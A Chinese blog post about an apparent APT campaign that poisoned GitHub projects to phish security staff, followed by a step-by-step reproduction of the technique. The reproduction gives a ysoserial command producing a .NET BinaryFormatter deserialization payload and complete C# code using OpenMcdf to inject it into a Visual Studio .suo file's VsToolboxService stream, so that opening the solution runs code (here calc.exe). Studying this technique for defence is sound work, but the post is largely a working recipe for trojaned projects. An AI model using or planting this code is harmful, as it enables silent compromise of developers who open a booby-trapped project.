6 [新一代Github投毒针对网络安全人员钓鱼]

学编程的闹钟2025-02-04 16:19
0x01 前言

在Github上APT组织"海莲花"发布存在后门的提权BOF,通过该项目针对网络安全从业人员进行钓鱼。不过其实早在几年前就已经有人对Visual Studio项目恶意利用进行过研究,所以投毒的手法也不算是新的技术。但这次国内有大量的安全从业者转发该钓鱼项目导致此次事件的重要性,于是就有了这个"标题党"。

目前该钓鱼账号已经注销

0x02 攻击方式

该组织使用了Visual Studio程序中的 .suo 文件进行钓鱼攻击,当使用Visual Studio打开 .sln 程序的时候,Visual Studio 会自动加载并调用与之关联的 .suo 文件从而隐蔽的执行木马。

0x03 攻击复现

解决方案用户选项 (.suo) 文件是一种结构化存储或复合文件,以二进制格式存储。您可以将用户信息保存到流中,流的名称是用于识别 .suo 文件中的信息的键。解决方案用户选项文件用于存储用户首选项设置,并在 Visual Studio 保存解决方案时自动创建。

当环境打开 .suo 文件时,它会枚举所有当前已加载的 VSPackage。如果 VSPackage 实现了IVsPersistSolutionOpts接口,则环境会调用VSPackage 上的LoadUserOptions方法,要求它从 .suo 文件加载其所有数据。

VSPackage 负责了解它可能已将哪些流写入 .suo 文件。对于它写入的每个流,VSPackage 通过LoadPackageUserOpts回调环境以加载由键(即流的名称)标识的特定流。然后,环境回调 VSPackage 以读取该特定流,并传递流的名称和IStream指向LoadPackageUserOpts方法的指针。

这里我们需要通过Visual Studio创建一个Windows窗体应用,并且选择 视图 > 工具箱,在工具箱中,随便拖拽一个控件(如按钮)到设计界面进行保存后会在.vs文件夹里会存在.suo文件

那么我们就需要准备ysoserial生成 .NET 反序列化恶意Payload

复制代码 
ysoserial.exe -f BinaryFormatter -g ActivitySurrogateDisableTypeCheck -o base64 -c "calc.exe"

接下来就需要安装 OpenMcdf 库,一个处理 Microsoft Compound 文件(如 .suo 文件)的 C# 库,打开 Package Manager Console,执行以下命令安装:

复制代码 
Install-Package OpenMcdf

这时候就能创建一个新的.cs文件来把生成的 Payload 注入到 VsToolboxService 流中

复制代码 
using System;
using OpenMcdf;
using System.IO;

class Program
{
    static void Main(string[] args)
    {
        string in_suo_file = @"C:\Path\To\.suo";  // 修改为实际的 .suo 文件路径
        string temp_file = @"C:\Path\To\test.suo";    // 修改为保存修改后的 .suo 文件路径

        // Base64 解码 ysoserial 生成的 Payload
        byte[] result = Convert.FromBase64String("YOUR_BASE64_PAYLOAD");  // 替换为第 2 步中生成的 Base64 字符串

        try
        {
            // 打开原始 .suo 文件 (UpdateMode)
            CompoundFile cf = new CompoundFile(in_suo_file, CFSUpdateMode.Update, CFSConfiguration.Default);

            // 获取 "VsToolboxService" 流并注入恶意数据
            CFStream stream = cf.RootStorage.GetStream("VsToolboxService");
            stream.SetData(result);

            // 提交更改
            cf.Commit();

            // 保存修改后的文件
            cf.SaveAs(temp_file);
            cf.Close();

            Console.WriteLine("Modified .suo file saved to temporary location: " + temp_file);

            // 你可以手动替换原 `.suo` 文件,或者在代码中执行替换
            File.Copy(temp_file, in_suo_file, true);

            Console.WriteLine("Original .suo file replaced successfully!");
        }
        catch (Exception ex)
        {
            Console.WriteLine("An error occurred: " + ex.Message);
        }
    }
}

这个时候我们的恶意.suo文件就做好了,那么我们重启这个项目看看会不会打开Windows计算器

相关推荐
baozj26 分钟前
把徒步轨迹做成 3D 地形模型:开源工具「印迹 TrailPrint 3D」
前端·vue.js·github
逛逛GitHub37 分钟前
这 2 个免费的开源 Skill 太给劲儿,直接替代 Playwright。
github
uhakadotcom38 分钟前
什么是Mass Assignment(批量赋值)风险
后端·面试·github
SeaTunnel1 小时前
87 个 PR 迭代复盘|Apache SeaTunnel 5 月版本重点更新解读
大数据·数据库·开源·apache·seatunnel
DolphinScheduler社区1 小时前
实战演示 | 基于 Apache DolphinScheduler 与 Apache SeaTunnel 实现 MySQL 到 Doris 离线定时增量同步
数据库·mysql·开源·apache·海豚调度·大数据工作流调度
Harvy_没救了2 小时前
【github爆款】MarkItDown 部署与测评报告
github
comcoo2 小时前
避坑指南:OpenClaw v2.7.9 Windows/macOS 零基础安装全过程
人工智能·windows·macos·github·开源软件·open claw·open claw部署包
SL-staff2 小时前
Vue3私有化AI白板落地实战|解决政企项目智能绘图合规难题(可直接复用源码)
人工智能·低代码·开源·vue3·白板·jvs规则引擎·jvs-draw
国产化创客2 小时前
嵌入式视觉完整技术体系--ESP32/K230/RDK-X5/树莓派四层架构全解析
嵌入式硬件·物联网·架构·开源·智能硬件
爱上纯净的蓝天2 小时前
AtomCode 源码编译与二次开发入门
开源·二次开发·源码编译·atomcode
热门推荐
01《置身钉内》原文-可播放阅读02【AI】2026 年具身智能模型和世界模型总结03GitHub 镜像站点042026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?05Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析062026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf07Codex 下载安装指南:Windows 和 macOS 官方版下载08AI科技热点日报 | 2026年6月1日09【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法10CC-Switch 下载、安装与使用配置指南【2026.5.29】